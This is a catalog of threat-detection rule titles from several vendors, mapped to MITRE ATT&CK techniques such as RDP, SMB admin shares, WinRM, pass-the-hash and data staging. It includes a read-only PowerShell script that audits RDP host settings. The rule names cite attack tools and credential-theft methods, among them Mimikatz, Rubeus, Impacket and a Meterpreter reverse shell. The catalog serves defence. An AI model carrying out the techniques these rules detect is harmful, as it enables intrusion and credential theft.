- Splunk Windows RDP Login Session Was Established production
- Splunk Windows RDP Server Registry Entry Created production
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Remote Host Computer Management Access production
- Splunk Windows Remote Management Execute Shell production
- Splunk Windows Remote Service Rdpwinst Tool Execution production
- Splunk Windows Remote Services Allow Rdp In Firewall production
- Splunk Windows Remote Services Allow Remote Assistance production
- Splunk Windows Remote Services Rdp Enable production
- Splunk Windows RMM Named Pipe production
- Sigma Windows Share Mount Via Net.EXE test
- Splunk Windows Share Multiple File Access (Windows Event Log)
- Splunk Windows Special Privileged Logon On Multiple Hosts production
- Splunk Windows SpeechRuntime COM Hijacking DLL Load production
- Splunk Windows SpeechRuntime Suspicious Child Process production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Windows Theme File Creation in Unusual Location production
- Sigma WinRM listening service reconnaissance (process) experimental
- Sigma WinRM listening service reconnaissance (WS-Management) experimental
- Kusto WinRM Plugin Lateral Movement
- Splunk WinRM Tools (PowerShell)
- Splunk WinRM Tools (Sysmon)
- Splunk WinRM Tools (Windows Event Log)
- Sigma Winrs Local Command Execution experimental
- Sigma WinRS usage for remote execution
- Elastic WMI Incoming Lateral Movement production
- Elastic WMIC Remote Command production
- Sigma Wmiprvse Wbemcomn DLL Hijack test
- Sigma Wmiprvse Wbemcomn DLL Hijack - File test
- Splunk Wsmprovhost LOLBAS Execution Process Spawn production
Remote Services: Remote Desktop Protocol T1021.001 57 rules
- Splunk Allow Inbound Traffic By Firewall Rule Registry production
- Splunk Allow Inbound Traffic In Firewall Rule production
- Sigma Denied Access To Remote Desktop test
- Sigma Denied RDP login with valid credentials experimental
- Elastic Execution via TSClient Mountpoint production
- Sigma Hermetic Wiper TG Process Patterns test
- Elastic Lateral Movement via Startup Folder production
- Splunk MSTSC Execution (EDR)
- Splunk MSTSC Execution (Windows Event Log)
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New Remote Desktop Connection Initiated Via Mstsc.EXE test
- Sigma Outbound RDP Connections Over Non-Standard Tools test
- Sigma Port Forwarding Activity Via SSH.EXE test
- Elastic Potential Outgoing RDP Connection by Unusual Process production
- Elastic Potential Remote Desktop Shadowing Activity production
- Elastic Potential Remote Desktop Tunneling Detected production
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Sigma RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class experimental
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Sigma RDP Login from Localhost test
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Sigma RDP Over Reverse SSH Tunnel test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Sigma RDP to HTTP or HTTPS Target Ports test
- Sigma RDP tunneling configuration enabled for port forwarding experimental
- Sigma RDP tunneling via ngrok detected experimental
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Splunk Remote Desktop Process Running On System experimental
- Kusto Remote Desktop Protocol - SharpRDP available
- Sigma Suspicious Plink Port Forwarding test
- Sigma Suspicious RDP Redirect Using TSCON test
- Sigma User Added to Remote Desktop Users Group test
- Splunk Windows Default RDP File Creation By Non MSTSC Process production
- Splunk Windows Default Rdp File Unhidden production
- Splunk Windows MSTSC RDP Commandline production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows RDP Bitmap Cache File Creation production
- Splunk Windows RDP Client Launched with Admin Session production
- Splunk Windows RDP File Execution production
- Splunk Windows RDP Login Session Was Established production
- Splunk Windows RDP Server Registry Entry Created production
- Splunk Windows Remote Service Rdpwinst Tool Execution production
- Splunk Windows Remote Services Allow Rdp In Firewall production
- Splunk Windows Remote Services Allow Remote Assistance production
- Splunk Windows Remote Services Rdp Enable production
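Several of the T1021.001 entries above key on the same few host settings (the fDenyTSConnections and UserAuthentication registry values, the Shadow policy value, the Remote Desktop Users local group, and the Remote Desktop firewall rule group). The PowerShell below is an added example, not taken from any of the listed rules or their vendors: it reads those settings on a host so an analyst triaging one of these alerts can confirm what changed. The registry paths, group name and firewall group are standard Windows locations; the baseline values it compares against are an assumption and should be set to the organisation's own policy.

```powershell
# Added example (not from any catalog rule): audit the RDP host settings that the
# T1021.001 rules above alert on. Run in an elevated PowerShell session on the host.

$checks = @(
    @{
        Name     = 'RDP connections denied (fDenyTSConnections)'
        Path     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
        Value    = 'fDenyTSConnections'
        Baseline = 1        # assumption: 1 (deny) unless the host is an approved RDP target
    },
    @{
        Name     = 'Network Level Authentication required (UserAuthentication)'
        Path     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
        Value    = 'UserAuthentication'
        Baseline = 1        # assumption: NLA must stay on
    },
    @{
        Name     = 'Shadow session policy (Shadow; 2 or 4 = control/view without consent)'
        Path     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
        Value    = 'Shadow'
        Baseline = $null    # assumption: value absent (not configured) on a clean host
    }
)

function Get-RdpSettingReport {
    # Compare each registry value with its baseline and flag drift.
    foreach ($c in $checks) {
        $item   = Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue
        $actual = if ($null -ne $item) { $item.($c.Value) } else { $null }
        [pscustomobject]@{
            Check    = $c.Name
            Actual   = $actual
            Baseline = $c.Baseline
            Drift    = ($actual -ne $c.Baseline)
        }
    }
}

function Get-RdpGroupMembers {
    # Membership of the group that "User Added to Remote Desktop Users Group" watches.
    Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue |
        Select-Object Name, ObjectClass, PrincipalSource
}

function Get-RdpFirewallRules {
    # The rule group that netsh toggles in "Remote Desktop Enabled in Windows Firewall by Netsh".
    Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
        Select-Object DisplayName, Enabled, Direction, Profile
}

Get-RdpSettingReport | Format-Table -AutoSize
Get-RdpGroupMembers  | Format-Table -AutoSize
Get-RdpFirewallRules | Format-Table -AutoSize
```

A `Drift` of `True` on the first check with `Actual = 0` means RDP has been enabled on the host; an unexpected member in the group output or an enabled inbound rule in the firewall output corresponds to the group-change and netsh rules listed above. Capturing this output before remediation preserves the state an incident responder will want alongside the alert.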
Remote Services: SMB/Windows Admin Shares T1021.002 97 rules
- Sigma Access To ADMIN$ Network Share test
- Kusto Anomaly in SMB Traffic(ASIM Network Session schema) available
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- YARA-L Copy From Or To Admin Share Or Sysvol Folder
- Sigma DCERPC SMB Spoolss Named Pipe test
- Sigma DCOM InternetExplorer.Application Iertutil DLL Hijack - Security test
- Splunk Detect PsExec With accepteula Flag production
- Splunk Executable File Written in Administrative SMB Share production
- Sigma First Time Seen Remote Named Pipe test
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HackTool - SharpMove Tool Execution test
- Splunk Impacket Lateral Movement Activity (Sysmon)
- Splunk Impacket Lateral Movement Activity (Windows Event Log)
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket PsExec Execution test
- Sigma Impacket WMIexec execution via SMB admin share experimental
- Sigma Lateral movement by mounting a network share - net use (command) experimental
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Lateral Movement via Startup Folder production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma Metasploit SMB Authentication test
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share Basic
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With Asset Entity
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Enrichment
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Entity
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Splunk Net.exe Use with URL (Sysmon)
- Splunk Net.exe Use with URL (Windows Event Log)
- Sigma Network share manipulation via commandline
- Sigma New network file share created experimental
- Elastic NullSessionPipe Registry Modification production
- Sigma Number of oustanding SMB requests increased experimental
- Sigma Password Provided In Command Line Of Net.EXE test
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack - Image Load test
- Splunk Potential EternalBlue via Metasploit (Windows Event Log)
- Elastic Potential Lateral Tool Transfer via SMB Share production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential Network Share Discovery production
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Sigma Protected Storage Service Access test
- Sigma PSexec execution over SMB share experimental
- Elastic PsExec Network Connection production
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Elastic Remote Execution via File Shares production
- Elastic Remote File Copy to a Hidden Share production
- Sigma Remote Service Activity via SVCCTL Named Pipe test
- Sigma Remote shell execution via SMB admin share experimental
- Elastic Remote Windows Service Installed production
- Sigma Rundll32 Execution Without Parameters test
- Sigma Rundll32 UNC Path Execution test
- Elastic Service Command Lateral Movement production
- Sigma Shared printer creation (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SMB admin share accessed experimental
- Elastic SMB Connections via LOLBin or Untrusted Process production
- Sigma SMB Create Remote File Admin Share test
- Splunk SMB Write Access on Administrative Share (Windows Event Log)
- Kusto SMB/Windows Admin Shares available
- Sigma smbexec.py Service Installation test
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious New-PSDrive to Admin Share test
- Sigma Suspicious permissions modification on a network share experimental
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious PsExec Execution test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Sigma T1047 Wmiprvse Wbemcomn DLL Hijack test
- Sigma Turla Group Lateral Movement test
- Sigma Unsigned or Unencrypted SMB Connection to Share Established experimental
- Sigma Windows Admin Share Mount Via Net.EXE test
- Splunk Windows Admin$ Share Access (Sysmon)
- Splunk Windows Admin$ Share Access (Windows Event Log)
- Splunk Windows C$ Share Access (EDR)
- Splunk Windows C$ Share Access (Sysmon)
- Splunk Windows C$ Share Access (Windows Event Log)
- Sigma Windows Internet Hosted WebDav Share Mount Via Net.EXE test
- Splunk Windows IPC$ Share Access (Sysmon)
- Splunk Windows IPC$ Share Access (Windows Event Log)
- Splunk Windows PUA Named Pipe production
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows RMM Named Pipe production
- Sigma Windows Share Mount Via Net.EXE test
- Splunk Windows Share Multiple File Access (Windows Event Log)
- Splunk Windows Special Privileged Logon On Multiple Hosts production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Windows Theme File Creation in Unusual Location production
- Sigma Wmiprvse Wbemcomn DLL Hijack test
- Sigma Wmiprvse Wbemcomn DLL Hijack - File test
Remote Services: Distributed Component Object Model T1021.003 38 rules
- Sigma BaaUpdate.exe Suspicious DLL Load experimental
- Sigma DCOM InternetExplorer.Application Iertutil DLL Hijack - Security test
- Kusto DCOM Lateral Movement available
- Sigma DCOM lateral movement (via MMC20) experimental
- Kusto Detecting Macro Invoking ShellBrowserWindow COM Objects available
- Sigma HackTool - Potential Impacket Lateral Movement Activity stable
- Sigma Impacket DCOMexec privilege abuse via MMC experimental
- Sigma Impacket DCOMexec process abuse via MMC experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Splunk Invoke-DCOM.ps1 - PowerShell (PowerShell)
- Splunk Invoke-DCOM.ps1 - PowerShell (Sysmon)
- Splunk Invoke-DCOM.ps1 - PowerShell (Windows Event Log)
- Kusto Lateral Movement via DCOM available
- Splunk Mmc LOLBAS Execution Process Spawn production
- Sigma MMC Spawning Windows Shell test
- Sigma MMC20 Lateral Movement test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack - Image Load test
- Sigma Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Remote Process Instantiation via DCOM and PowerShell production
- Splunk Remote Process Instantiation via DCOM and PowerShell Script Block production
- Sigma Suspicious BitLocker Access Agent Update Utility Execution experimental
- Elastic Suspicious Cmd Execution via WMI production
- Sigma Suspicious Speech Runtime Binary Child Process experimental
- Sigma Suspicious WSMAN Provider Image Loads test
- Splunk Windows Excel Spawning Microsoft Project Application production
- Splunk Windows SpeechRuntime COM Hijacking DLL Load production
- Splunk Windows SpeechRuntime Suspicious Child Process production
- Elastic WMI Incoming Lateral Movement production
- Elastic WMIC Remote Command production
Remote Services: SSH T1021.004 10 rules
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma OpenSSH native server feature installation experimental
- Sigma OpenSSH Server Listening On Socket test
- Sigma OpenSSH server listening on socket experimental
- Sigma OpenSSH service activation on Windows experimental
- Sigma Port Forwarding Activity Via SSH.EXE test
- Elastic Potential Remote Desktop Tunneling Detected production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows Protocol Tunneling with Plink production
- Splunk Windows PuTTY Suite Utility Execution production
Remote Services: VNC T1021.005 1 rule
- Sigma Suspicious UltraVNC Execution test
Remote Services: Windows Remote Management T1021.006 31 rules
- Sigma Enable Windows Remote Management test
- Sigma Execute Invoke-command on Remote Host test
- Sigma HackTool - WinRM Access Via Evil-WinRM test
- Splunk Impacket SMBexec (Windows Event Log)
- Elastic Incoming Execution via PowerShell Remoting production
- Elastic Incoming Execution via WinRM Remote Shell production
- Splunk Interactive Session on Remote Endpoint with PowerShell production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential Lateral Movement via Windows Remote Shell experimental
- Sigma Potential Remote PowerShell Session Initiated test
- YARA-L Potential Remote PowerShell Session Initiated
- Splunk Powershell Remote Services Add TrustedHost production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Splunk Remote Process Instantiation via WinRM and PowerShell production
- Splunk Remote Process Instantiation via WinRM and PowerShell Script Block production
- Splunk Remote Process Instantiation via WinRM and Winrs production
- Splunk Windows Remote Host Computer Management Access production
- Splunk Windows Remote Management Execute Shell production
- Sigma WinRM listening service reconnaissance (process) experimental
- Sigma WinRM listening service reconnaissance (WS-Management) experimental
- Kusto WinRM Plugin Lateral Movement
- Splunk WinRM Tools (PowerShell)
- Splunk WinRM Tools (Sysmon)
- Splunk WinRM Tools (Windows Event Log)
- Sigma Winrs Local Command Execution experimental
- Sigma WinRS usage for remote execution
- Elastic WMIC Remote Command production
- Splunk Wsmprovhost LOLBAS Execution Process Spawn production
Remote Services: Cloud Services T1021.007 1 rule
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
Software Deployment Tools T1072 11 rules
- Splunk Detection of tools built by NirSoft experimental
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies available
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies (ASIM Version)
- Sigma PDQ Deploy Remote Adminstartion Tool Execution test
- Elastic Potential WSUS Abuse for Lateral Movement production
- Sigma PUA - Radmin Viewer Utility Execution test
- Splunk Radmin execution (EDR)
- Splunk Radmin execution (Sysmon)
- Splunk Radmin execution (Windows Event Log)
- Sigma Restricted Software Access By SRP test
- Sigma Suspicious Csi.exe Usage test
Taint Shared Content T1080 2 rules
Replication Through Removable Media T1091 8 rules
- Elastic Execution from a Removable Media with Network Connection production
- Sigma External Disk Drive Or USB Storage Device Was Recognized By The System test
- Elastic First Time Seen Removable Device production
- Splunk Removable Media Detected (Windows Event Log)
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows Replication Through Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
Exploitation of Remote Services T1210 27 rules
- Sigma Audit CVE Event test
- Splunk Detect Computer Changed with Anonymous Account production
- Sigma DNS Query Request By QuickAssist.EXE experimental
- Sigma Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC test
- Kusto Gain Code Execution on ADFS Server via Remote WMI Execution
- Kusto Gain Code Execution on ADFS Server via SMB + Remote Service or Scheduled Task available
- Sigma HackTool - SharpWSUS/WSUSpendu Execution test
- Splunk Impacket Lateral Movement Activity (Sysmon)
- Splunk Impacket Lateral Movement Activity (Windows Event Log)
- Elastic Microsoft Exchange Server UM Spawning Suspicious Processes production
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Kusto Oracle suspicious command execution available
- Splunk Potential network connection with CVE-2023-21554 (Sysmon)
- Splunk Potential network connection with CVE-2023-21554 (Windows Event Log)
- Sigma Potential RDP Exploit CVE-2019-0708 test
- Elastic Potential WSUS Abuse for Lateral Movement production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Remote domain controller password reset (Zerologon) experimental
- Sigma Scanner PoC for CVE-2019-0708 RDP RCE Vuln test
- Kusto Service Accounts Performing Remote PS available
- Sigma Suspicious SysAidServer Child test
- Sigma Terminal Service Process Spawn test
- Elastic Unusual Child Process of dns.exe production
- Elastic Unusual File Operation by dns.exe production
- Elastic Unusual Process For MSSQL Service Accounts production
- Sigma WannaCry Ransomware Activity test
- Splunk ZeroLogon CVE-2020-1472 (Windows Event Log)
Use Alternate Authentication Material T1550 29 rules
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma Hacktool Ruler test
- Splunk Kerberos TGT Request Using RC4 Encryption production
- Elastic Kerberos Traffic from Unusual Process production
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Mimikatz Pass-the-hash login experimental
- Splunk Mimikatz PassTheTicket CommandLine Parameters production
- Sigma NTLM Logon test
- Sigma NTLMv1 Logon Between Client and Server test
- Sigma Outgoing Logon with New Credentials test
- Sigma Pass the Hash Activity 2 stable
- Splunk Pass-the-Hash (Windows Event Log)
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Pass-the-Hash (PtH) Attempt production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Kerberos Ticket Exports Through Winlogon Access production
- Sigma Successful Overpass the Hash Attempt test
- Sigma Uncommon Outbound Kerberos Connection test
- Splunk Unknown Process Using The Kerberos Protocol production
- Kusto UnPAC the hash
- Splunk Windows AD Suspicious Attribute Modification production
- Splunk Windows Process With NetExec Command Line Parameters production
- Splunk Windows Steal Authentication Certificates - ESC1 Authentication production
Use Alternate Authentication Material: Pass the Hash T1550.002 13 rules
- Sigma Hacktool Ruler test
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Mimikatz Pass-the-hash login experimental
- Sigma NTLM Logon test
- Sigma NTLMv1 Logon Between Client and Server test
- Sigma Pass the Hash Activity 2 stable
- Splunk Pass-the-Hash (Windows Event Log)
- Elastic Potential Pass-the-Hash (PtH) Attempt production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Successful Overpass the Hash Attempt test
Use Alternate Authentication Material: Pass the Ticket T1550.003 10 rules
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Elastic Kerberos Traffic from Unusual Process production
- Splunk Mimikatz PassTheTicket CommandLine Parameters production
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Kerberos Ticket Exports Through Winlogon Access production
- Sigma Uncommon Outbound Kerberos Connection test
- Kusto UnPAC the hash
- Splunk Windows Process With NetExec Command Line Parameters production
Remote Service Session Hijacking T1563 8 rules
- Sigma Potential MSTSC Shadowing Activity test
- Elastic Potential Remote Desktop Shadowing Activity production
- Splunk RDP Hijacking (Windows Event Log)
- Sigma RDP session hijack via service creation abuse experimental
- Sigma RDP session hijack via TSCON abuse command experimental
- Sigma Suspicious RDP Redirect Using TSCON test
- Splunk Windows RDP Connection Successful production
- Splunk Windows Service Create with Tscon production
Remote Service Session Hijacking: RDP Hijacking T1563.002 8 rules
- Sigma Potential MSTSC Shadowing Activity test
- Elastic Potential Remote Desktop Shadowing Activity production
- Splunk RDP Hijacking (Windows Event Log)
- Sigma RDP session hijack via service creation abuse experimental
- Sigma RDP session hijack via TSCON abuse command experimental
- Sigma Suspicious RDP Redirect Using TSCON test
- Splunk Windows RDP Connection Successful production
- Splunk Windows Service Create with Tscon production
Lateral Tool Transfer T1570 33 rules
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Elastic Execution via TSClient Mountpoint production
- Kusto Identify Mango Sandstorm powershell commands
- Elastic Lateral Movement via Startup Folder production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- YARA-L MITRE ATT&CK T1570 Suspicious Command PSExec
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies available
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies (ASIM Version)
- Elastic Potential Lateral Tool Transfer via SMB Share production
- Elastic Potential Ransomware Behavior - Note Files by System production
- Sigma Potentially Suspicious File Creation by OpenEDR's ITSMService experimental
- Elastic PsExec Network Connection production
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote Execution via File Shares production
- Elastic Remote File Copy to a Hidden Share production
- Kusto Remote File Creation with PsExec available
- Sigma Rundll32 Execution Without Parameters test
- Elastic Scheduled Task Execution at Scale via GPO production
- Sigma SMB over QUIC Via Net.EXE test
- Sigma SMB over QUIC Via PowerShell Script test
- Elastic Suspicious Execution from a WebDav Share production
Collection
Data from Local System T1005 26 rules
- Elastic Accessing Outlook Data Files production
- Kusto AD FS Remote Auth Sync Connection available
- Kusto AD FS Remote HTTP Network Connection available
- Kusto ADFS Database Named Pipe Connection available
- Sigma ADFS Database Named Pipe Connection By Uncommon Tool test
- Kusto ADFS DKM Master Key Export
- Elastic Attempted Private Key Access production
- Sigma Crash Dump Created By Operating System experimental
- Kusto Deimos Component Execution available
- Elastic Encrypting Files with WinRar or 7z production
- Sigma Esentutl Steals Browser Information test
- Splunk Esentutl.exe Collecting Browser Data (Sysmon)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Kusto Microsoft Entra ID Health Monitoring Agent Registry Keys Access
- Kusto Microsoft Entra ID Health Service Agents Registry Keys Access
- Sigma Potential Conti Ransomware Database Dumping Activity Via SQLCmd test
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Sigma Shai-Hulud NPM Package Malicious Exfiltration via Curl experimental
- Sigma SQLite Chromium Profile Data DB Access test
- Sigma SQLite Firefox Profile Data DB Access test
- Splunk Sqlite Module In Temp Folder production
- Sigma Veeam Backup Database Suspicious Query test
- Sigma VeeamBackup Database Credentials Dump Via Sqlcmd.EXE test
- Splunk Windows Copy Files (PowerShell)
- Splunk Windows Copy Files (Sysmon)
- Splunk Windows Copy Files (Windows Event Log)
Data from Removable Media T1025 4 rules
- Splunk Removable Media Detected (Windows Event Log)
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
Data from Network Shared Drive T1039 9 rules
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- Kusto Excessive share permissions available
- Elastic Potential Network Share Discovery production
- Sigma Suspicious Access to Sensitive File Extensions test
- Splunk Windows Copy Files (PowerShell)
- Splunk Windows Copy Files (Sysmon)
- Splunk Windows Copy Files (Windows Event Log)
- Elastic Windows Network Enumeration production
- Splunk Windows Network Share Interaction Via Net production
Input Capture T1056 10 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma DNS Query Request To OneLaunch Update Service test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Keylogging T1056.001 3 rules
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
Input Capture: GUI Input Capture T1056.002 3 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Credential API Hooking T1056.004 4 rules
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Data Staged T1074 17 rules
- Splunk Command Output Redirected to Localhost (Windows Event Log)
- Splunk Data Staged to File (PowerShell)
- Splunk Data Staged to File (Sysmon)
- Splunk Data Staged to File (Windows Event Log)
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet test
- Splunk Native Archive Commands (PowerShell)
- Splunk Native Archive Commands (Sysmon)
- Splunk Native Archive Commands (Windows Event Log)
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Elastic Remote File Copy to a Hidden Share production
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Splunk Suspicious SQLite3 LSQuarantine Behavior experimental
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Module test
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Script test
Data Staged: Local Data Staging T1074.001 14 rules
- Splunk Data Staged to File (PowerShell)
- Splunk Data Staged to File (Sysmon)
- Splunk Data Staged to File (Windows Event Log)
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet test
- Splunk Native Archive Commands (PowerShell)
- Splunk Native Archive Commands (Sysmon)
- Splunk Native Archive Commands (Windows Event Log)
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Module test
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Script test
Data Staged: Remote Data Staging T1074.002 1 rule
- Elastic Remote File Copy to a Hidden Share production
Screen Capture T1113 18 rules
- Splunk NirCmd Execution (Sysmon)
- Splunk NirCmd Execution (Windows Event Log)
- Sigma Periodic Backup For System Registry Hives Enabled test
- Elastic Potential Remote Desktop Shadowing Activity production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Splunk Remcos RAT File Creation in Remcos Folder production
- Sigma Screen Capture Activity Via Psr.EXE test
- Splunk Suspicious Image Creation In Appdata Folder production
- Splunk Suspicious WAV file in Appdata Folder production
- Sigma System Drawing DLL Load test
- Sigma Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted test
- Sigma Windows Recall Feature Enabled - Registry test
- Sigma Windows Recall Feature Enabled Via Reg.EXE test
- Splunk Windows Screen Capture in TEMP folder production
- Splunk Windows Screen Capture Via Powershell production
- Sigma Windows Screen Capture with CopyFromScreen test
Email Collection T1114 13 rules
- Elastic Accessing Outlook Data Files production
- Splunk Email files written outside of the Outlook directory experimental
- Splunk Exchange New Export Request (PowerShell)
- Sigma Exchange PowerShell Snap-Ins Usage test
